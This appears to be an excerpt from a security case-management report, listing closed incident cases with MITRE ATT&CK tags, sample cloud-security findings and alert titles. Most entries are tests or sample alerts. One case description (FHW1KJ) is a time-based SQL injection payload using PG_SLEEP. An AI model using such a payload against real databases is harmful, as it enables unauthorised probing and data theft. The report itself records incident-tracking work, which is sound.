+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------+---------------------+---------------------+-----------------------+
| CR0F6Y      | Cydarm           | Incident from DPC                                                                                                                                                      |              | Closed     |                                                | 2021-05-25 03:19:00 | 2021-06-02 13:20:00 | 8d 10h 1m 32s         |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------+---------------------+---------------------+-----------------------+
| QDCJ74      | Cydarm           | New data received via webhook                                                                                                                                          |              | Closed     |                                                | 2021-06-27 17:46:00 | 2021-06-27 17:49:00 | 3m 5s                 |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------+---------------------+---------------------+-----------------------+
| XHM6JJ      | Cydarm           | New data received via webhook                                                                                                                                          |              | Closed     |                                                | 2021-06-27 17:46:00 | 2021-06-27 17:49:00 | 2m 55s                |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------+---------------------+---------------------+-----------------------+
| 6J512L      | Cydarm           | New data received via webhook                                                                                                                                          |              | Closed     |                                                | 2021-06-27 17:46:00 | 2021-06-27 17:49:00 | 3m 29s                |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------+---------------------+---------------------+-----------------------+
| 2VRSWH      | Cydarm           | New data received via webhook                                                                                                                                          |              | Closed     |                                                | 2021-06-27 17:46:00 | 2021-06-27 17:49:00 | 3m 14s                |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------+---------------------+---------------------+-----------------------+
| GEKZQU      | Cydarm           | New data received via webhook                                                                                                                                          |              | Closed     |                                                | 2021-06-27 17:47:00 | 2021-06-27 17:49:00 | 2m 34s                |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------+---------------------+---------------------+-----------------------+
| 4LU0LW      | Cydarm           | New data received via webhook                                                                                                                                          |              | Closed     |                                                | 2021-06-27 17:43:00 | 2021-06-27 17:49:00 | 6m 5s                 |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------+---------------------+---------------------+-----------------------+
| P1AM48      | Cydarm           | New data received via webhook                                                                                                                                          |              | Closed     |                                                | 2021-06-27 17:46:00 | 2021-06-27 17:49:00 | 3m 24s                |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------+---------------------+---------------------+-----------------------+
| SMJWST      | Cydarm           | New data received via webhook                                                                                                                                          |              | Closed     |                                                | 2021-06-27 17:47:00 | 2021-06-27 17:49:00 | 2m 30s                |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------+---------------------+---------------------+-----------------------+
| S0RSU8      | Cydarm           | New data received via webhook                                                                                                                                          |              | Closed     |                                                | 2021-06-27 17:46:00 | 2021-06-27 17:49:00 | 2m 50s                |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------+---------------------+---------------------+-----------------------+
| 7Z57JG      | Cydarm           | New data received via webhook                                                                                                                                          |              | Closed     |                                                | 2021-06-27 17:45:00 | 2021-06-27 17:49:00 | 3m 57s                |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------+---------------------+---------------------+-----------------------+
| D82DJX      | Cydarm           | New data received via webhook                                                                                                                                          |              | Closed     |                                                | 2021-06-27 17:45:00 | 2021-06-27 17:49:00 | 3m 51s                |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------+---------------------+---------------------+-----------------------+
| ZZMA8M      | Cydarm           | New data received via webhook                                                                                                                                          |              | Closed     |                                                | 2021-06-27 17:46:00 | 2021-06-27 17:49:00 | 2m 59s                |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------+---------------------+---------------------+-----------------------+
| K25KTN      | Cydarm           | New data received via webhook                                                                                                                                          |              | Closed     |                                                | 2021-06-27 17:46:00 | 2021-06-27 17:49:00 | 3m 10s                |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------+---------------------+---------------------+-----------------------+
| 9JUKM1      | Cydarm           | New data received via webhook                                                                                                                                          |              | Closed     |                                                | 2021-06-27 17:45:00 | 2021-06-27 17:49:00 | 3m 46s                |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------+---------------------+---------------------+-----------------------+
| U4GEM5      | Cydarm           | New data received via webhook                                                                                                                                          |              | Closed     |                                                | 2021-06-27 17:46:00 | 2021-06-27 17:49:00 | 2m 45s                |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------+---------------------+---------------------+-----------------------+
| TR8GVT      | Cydarm           | New data received via webhook                                                                                                                                          |              | Closed     |                                                | 2021-06-27 17:46:00 | 2021-06-27 17:49:00 | 3m 40s                |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------+---------------------+---------------------+-----------------------+
| PXCYQN      | Cydarm           | New data received via webhook                                                                                                                                          |              | Closed     |                                                | 2021-06-27 17:46:00 | 2021-06-27 17:49:00 | 3m 34s                |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------+---------------------+---------------------+-----------------------+
| 3ACWSQ      | Cydarm           | New data received via webhook                                                                                                                                          |              | Closed     |                                                | 2021-06-27 17:47:00 | 2021-06-27 17:49:00 | 2m 24s                |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------+---------------------+---------------------+-----------------------+
| NXRP61      | Cydarm           | New data received via webhook                                                                                                                                          |              | Closed     |                                                | 2021-06-27 17:46:00 | 2021-06-27 17:49:00 | 3m 20s                |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------+---------------------+---------------------+-----------------------+
| 3FRBK6      | Cydarm           | New data received via webhook                                                                                                                                          |              | Closed     |                                                | 2021-06-27 17:47:00 | 2021-06-27 17:49:00 | 2m 40s                |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------+---------------------+---------------------+-----------------------+
| MWGTCK      | Cydarm           | New data received via webhook                                                                                                                                          |              | Closed     |                                                | 2021-06-27 17:47:00 | 2021-06-27 17:49:00 | 2m 20s                |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------+---------------------+---------------------+-----------------------+
| UMNXD0      | Cydarm           | New data received via webhook                                                                                                                                          |              | Closed     |                                                | 2021-06-27 17:49:00 | 2021-09-23 03:18:00 | 87d 9h 29m 6s         |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------+---------------------+---------------------+-----------------------+
| PNBFNN      | Cydarm           | New Alert: User \[john.doe@example.com\] modified a document \[AB_YC_AP_BEACH_sq.gif\] that has overly permissive share settings \[people_with_link\] \(from Panther\) |              | Closed     |                                                | 2021-10-04 06:56:00 | 2021-11-30 06:33:00 | 56d 23h 37m 44s       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------+---------------------+---------------------+-----------------------+
| KNJNKE      | Cydarm           | test new case                                                                                                                                                          |              | Closed     | mitre-attack:t1100-web_shell                   | 2021-03-28 22:54:00 | 2021-05-05 02:01:00 | 37d 3h 7m 20s         |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------+---------------------+---------------------+-----------------------+
| SLSUQZ      | Cydarm           | Test: Change case name                                                                                                                                                 |              | Closed     | mitre-attack:t1100-web_shell                   | 2021-01-11 03:59:00 | 2021-01-11 04:10:00 | 10m 43s               |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------+---------------------+---------------------+-----------------------+
| 5U5WK0      | Cydarm           | eric test 9                                                                                                                                                            |              | Closed     | mitre-attack:t1100-web_shell                   | 2021-12-20 23:54:00 | 2022-01-24 22:19:00 | 34d 22h 24m 37s       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------+---------------------+---------------------+-----------------------+
| 1CMKNC      | Cydarm           | Vaughan is at it again                                                                                                                                                 |              | Closed     |                                                | 2021-12-20 06:22:00 | 2021-12-20 06:23:00 | 1m 36s                |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------+---------------------+---------------------+-----------------------+
| 5ZWU4B      | Cydarm           | Testing 0.8.13 - Create a case - Changed Title                                                                                                                         |              | Closed     | mitre-attack:t1100-web_shell                   | 2021-03-05 02:53:00 | 2021-03-05 02:59:00 | 6m 32s                |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------+---------------------+---------------------+-----------------------+
| A3FDKQ      | Cydarm           | test contacts                                                                                                                                                          |              | Closed     | mitre-attack:t1100-web_shell                   | 2021-04-22 08:02:00 | 2021-05-07 06:09:00 | 14d 22h 6m 50s        |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------+---------------------+---------------------+-----------------------+
| 405997      | Cydarm           | Suspicious Activity                                                                                                                                                    |              | Closed     | mitre-attack:t1127-trusted_developer_utilities | 2021-12-07 02:46:00 | 2022-01-26 22:37:00 | 50d 19h 51m 32s       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------+---------------------+---------------------+-----------------------+
| VHRJAD      | Cydarm           | markdown test                                                                                                                                                          |              | Closed     |                                                | 2022-01-05 05:59:00 | 2022-01-24 22:14:00 | 19d 16h 15m 15s       |
|             |                  |                                                                                                                                                                        |              |            | reviewed                                       |                     |                     |                       |
|             |                  |                                                                                                                                                                        |              |            | mitre-attack:t1100-web_shell                   |                     |                     |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------+---------------------+---------------------+-----------------------+
| EVGX1G      | Cydarm           | Eric test 11                                                                                                                                                           |              | Closed     | mitre-attack:t1100-web_shell                   | 2021-12-20 23:55:00 | 2022-01-26 22:37:00 | 36d 22h 41m 21s       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------+---------------------+---------------------+-----------------------+
| TS21FM      | Cydarm           | Project Forcefield 2.01                                                                                                                                                |              | Closed     | mitre-attack:t1505-server_software_component   | 2022-01-24 02:01:00 | 2022-01-24 02:24:00 | 22m 40s               |
|             |                  |                                                                                                                                                                        |              |            | mitre-attack:t1161-lc_load_dylib_addition      |                     |                     |                       |
+-------------+------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------+---------------------+---------------------+-----------------------+ 

Table:Table 7: Cases opened during this reporting period and remaining open at the end of this reporting period. 

+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| **Locator** | **Organisation** | **Description**                                                                                                                                                                                         | **Severity** | **Status** | **Tag**                                              | **Opened**          |
+=============+==================+=========================================================================================================================================================================================================+==============+============+======================================================+=====================+
| 7Y3CA2      | Cydarm           | it's a case                                                                                                                                                                                             |              | Closed     | mitre-attack:t1012-query_registry                    | 2021-05-04 02:21:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| AVAKG7      | Cydarm           | User GeneratedFindingUserType : GeneratedFindingUserName is anomalously invoking APIs commonly used in Impact tactics.                                                                                  |              | Closed     |                                                      | 2021-03-11 16:01:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| AJ8NMR      | Cydarm           | AA20-352A.stix.json                                                                                                                                                                                     |              | Closed     | mitre-attack:t1193-spearphishing_attachment          | 2021-03-11 05:59:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| EDEHW2      | Cydarm           | API GeneratedFindingAPIName was invoked from a Parrot Security Linux computer.                                                                                                                          |              | Closed     |                                                      | 2021-03-11 16:00:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| TXDWSQ      | Cydarm           | multicase 2                                                                                                                                                                                             |              | Closed     |                                                      | 2021-06-24 01:27:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| YQAHED      | Cydarm           | staging alert                                                                                                                                                                                           |              | Closed     |                                                      | 2021-07-28 16:39:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| MB3PVS      | Cydarm           | 0.8.14 Testing_Ticket List                                                                                                                                                                              |              | Closed     | mitre-attack:t1100-web_shell                         | 2021-05-04 10:41:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 9JFAW3      | Cydarm           | VS test                                                                                                                                                                                                 |              | Closed     | mitre-attack:t1100-web_shell                         | 2021-05-13 23:34:00 |
|             |                  |                                                                                                                                                                                                         |              |            | Privacy                                              |                     |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| X90LYW      | Cydarm           | 0.8.13 - Test Case #2 - Adding to case group                                                                                                                                                            |              | Closed     | mitre-attack:t1100-web_shell                         | 2021-03-05 05:59:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| WTXYJS      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-06-27 17:49:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| CK8TBW      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-06-27 17:49:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 8G7ZVM      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-06-27 17:48:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| D3WGL8      | Cydarm           | New Alert: User \[john.doe@example.com\] modified a document \[AB_YC_AP_GARDEN_h_72dpi.jpg\] that has overly permissive share settings \[people_with_link\] \(from Panther\)                            |              | Closed     |                                                      | 2021-10-04 06:55:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| DCKTVQ      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-06-27 17:50:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| FDA78G      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-06-27 17:48:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| GWQSES      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-06-27 17:49:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| Y31MVC      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-06-27 17:50:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| VWVSFA      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-06-27 17:49:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| UVX4HK      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-06-27 17:49:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| UVAJEQ      | Cydarm           | New Alert: User \[john.doe@example.com\] made a document \[CARTER presentation to Example July 2021 \(1\).pdf\] externally visible for the first time with \[john.doe@example.com.au\] \(from Panther\) |              | Closed     |                                                      | 2021-10-04 06:56:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 6D7JY8      | Cydarm           | DGA domain name queried by EC2 instance i-99999999.                                                                                                                                                     |              | Closed     |                                                      | 2021-03-11 15:59:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| SX6432      | Cydarm           | Data exfiltration through DNS queries from EC2 instance i-99999999.                                                                                                                                     |              | Closed     |                                                      | 2021-03-11 15:59:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 93XGY9      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-06-27 17:50:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 01GPXX      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-06-27 17:50:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| R73G85      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-06-27 17:49:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| KUQGC7      | Cydarm           | EC2 instance i-99999999 is communicating with a Drop Point.                                                                                                                                             |              | Closed     |                                                      | 2021-03-11 15:59:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| TW0KB5      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-06-27 17:49:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| DMMMAW      | Cydarm           | \(edited\) New Alert: User \[john.doe@example.com\] modified a document \[AB_YC_AP_WAVES_sq.gif\] that has overly permissive share settings \[people_with_link\] \(from Panther\)                       |              | Closed     | remediation                                          | 2021-10-04 06:56:00 |
|             |                  |                                                                                                                                                                                                         |              |            | Phishing                                             |                     |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| CJGCSN      | Cydarm           | test 0.8.13                                                                                                                                                                                             |              | Closed     | mitre-attack:t1100-web_shell                         | 2021-03-07 02:20:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| YNFXDL      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-06-27 17:50:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| DZXVAF      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-06-27 17:50:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| WP5EX7      | Cydarm           | EC2 instance i-99999999 is communicating with Tor Entry node.                                                                                                                                           |              | Closed     |                                                      | 2021-03-11 15:59:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| WLXK9F      | Cydarm           | New Alert: User \[john.doe@example.com\] made a document \[Onboarding process HR\] externally visible for the first time with \[john.doe@example.com\] \(from Panther\)                                 |              | Closed     |                                                      | 2021-10-04 06:55:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| DNGFKD      | Cydarm           | Unusual reads of objects in S3 bucket GeneratedFindingS3Bucket.                                                                                                                                         |              | Closed     |                                                      | 2021-03-11 16:00:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| XX2AJ8      | Cydarm           | EC2 instance i-99999999 may be the target of a DNS rebinding attack.                                                                                                                                    |              | Closed     |                                                      | 2021-03-11 15:59:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| AABXBU      | Cydarm           | Unusual changes to network permissions by GeneratedFindingUserName.                                                                                                                                     |              | Closed     |                                                      | 2021-03-11 16:00:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 9ULLL5      | Cydarm           | New Alert: User \[john.doe@example.com\] modified a document \[AB_YC_AP_SIGNALS_sq.gif\] that has overly permissive share settings \[people_with_link\] \(from Panther\)                                |              | Closed     |                                                      | 2021-10-04 06:56:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| A7YZ78      | Cydarm           | New Alert: User \[john.doe@example.com\] modified a document \[AB_YC_AP_WAVES_sq.gif\] that has overly permissive share settings \[people_with_link\] \(from Panther\)                                  |              | Closed     | data-breach                                          | 2021-09-29 16:44:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 6JG4CR      | Cydarm           | EC2 instance i-99999999 communicating with a known Bitcoin-related IP Address.                                                                                                                          |              | Closed     |                                                      | 2021-03-11 15:59:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 24NSW1      | Cydarm           | Unusual enumeration of S3 bucket GeneratedFindingS3Bucket.                                                                                                                                              |              | Closed     |                                                      | 2021-03-11 16:00:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 99FFHA      | Cydarm           | testing Sysprop ticket                                                                                                                                                                                  |              | Closed     | mitre-attack:t1100-web_shell                         | 2021-02-19 07:34:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| NGX0HC      | Cydarm           | New Alert: This is a Test Alert \(from Panther\)                                                                                                                                                        |              | Closed     | mitre-attack:t1100-web_shell                         | 2021-09-29 08:25:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| ZE2GSX      | Cydarm           | Unusually large amount of network traffic from EC2 instance i-99999999.                                                                                                                                 |              | Closed     |                                                      | 2021-03-11 15:59:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 7DYWKH      | Cydarm           | User GeneratedFindingUserType : GeneratedFindingUserName is anomalously invoking APIs commonly used in Discovery tactics.                                                                               |              | Closed     |                                                      | 2021-03-11 16:01:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| X7U4L2      | Cydarm           | Suspicious inbound cases                                                                                                                                                                                |              | Closed     |                                                      | 2021-09-29 04:47:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 2GATHW      | Cydarm           | ET SCAN Suspicious inbound to mySQL port 3306  - \(D_TF62kB4npTB-Zo99zA\) - 10.20.0.235                                                                                                                 |              | Closed     |                                                      | 2021-06-27 17:41:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| J0GDUX      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-09-07 16:44:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 49K6NC      | Cydarm           | New data received via webhook                                                                                                                                                                           |              | Closed     |                                                      | 2021-09-29 08:25:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| FHW1KJ      | Cydarm           | ’||\(SELECT PG_SLEEP\(20\)\)-- -                                                                                                                                                                        |              | Closed     | mitre-attack:t1192-spearphishing_link                | 2021-06-04 03:57:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| XM9G07      | Cydarm           | Test Case                                                                                                                                                                                               |              | Closed     | mitre-attack:t1100-web_shell                         | 2021-02-18 06:59:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| ED71J7      | Cydarm           | SG Test                                                                                                                                                                                                 |              | Closed     | mitre-attack:t1100-web_shell                         | 2021-09-29 04:18:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| JKUDLN      | Cydarm           | new case 2                                                                                                                                                                                              |              | Closed     |                                                      | 2021-02-16 00:15:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| MGKL1N      | Cydarm           | New Alert: User \[john.doe@example.com\] modified a document \[AB_YC_AP_HIGHWAY_sq.gif\] that has overly permissive share settings \[people_with_link\] \(from Panther\)                                |              | Closed     | mitre-attack:t1161-lc_load_dylib_addition            | 2021-10-04 06:56:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 10R6FR      | Cydarm           | Amazon S3 Public Access was granted for S3 bucket GeneratedFindingS3Bucket.                                                                                                                             |              | Closed     |                                                      | 2021-03-11 16:00:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| PU2NRR      | Cydarm           | testing                                                                                                                                                                                                 |              | Closed     | mitre-attack:t1100-web_shell                         | 2021-03-04 05:42:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 56WQ6C      | Cydarm           | Unusual outbound communication seen from EC2 instance i-0c4349c4e1ba01976 on server port 43.                                                                                                            |              | Closed     |                                                      | 2021-03-11 15:39:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| U2LNLM      | Cydarm           | New Alert: User \[john.doe@example.com\] made a document \[Onboarding process HR\] externally visible for the first time with \[john.doe@example.com\] \(from Panther\)                                 |              | Closed     |                                                      | 2021-09-29 16:41:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| LJK127      | Cydarm           | test slack                                                                                                                                                                                              |              | Closed     | mitre-attack:t1100-web_shell                         | 2021-03-15 03:28:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| 4RR54A      | Cydarm           | test case                                                                                                                                                                                               |              | Closed     | mitre-attack:t1100-web_shell                         | 2021-12-05 09:58:00 |
|             |                  |                                                                                                                                                                                                         |              |            | data-breach                                          |                     |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
| ZT654E      | Cydarm           | New Alert: Okta.SystemLog: User \[Example Admin\] from IP \[54.206.87.24\] has exceeded the failed logins threshold \(from Panther\)                                                                    |              | Closed     |                                                      | 2021-10-04 06:56:00 |
+-------------+------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+------------+------------------------------------------------------+---------------------+
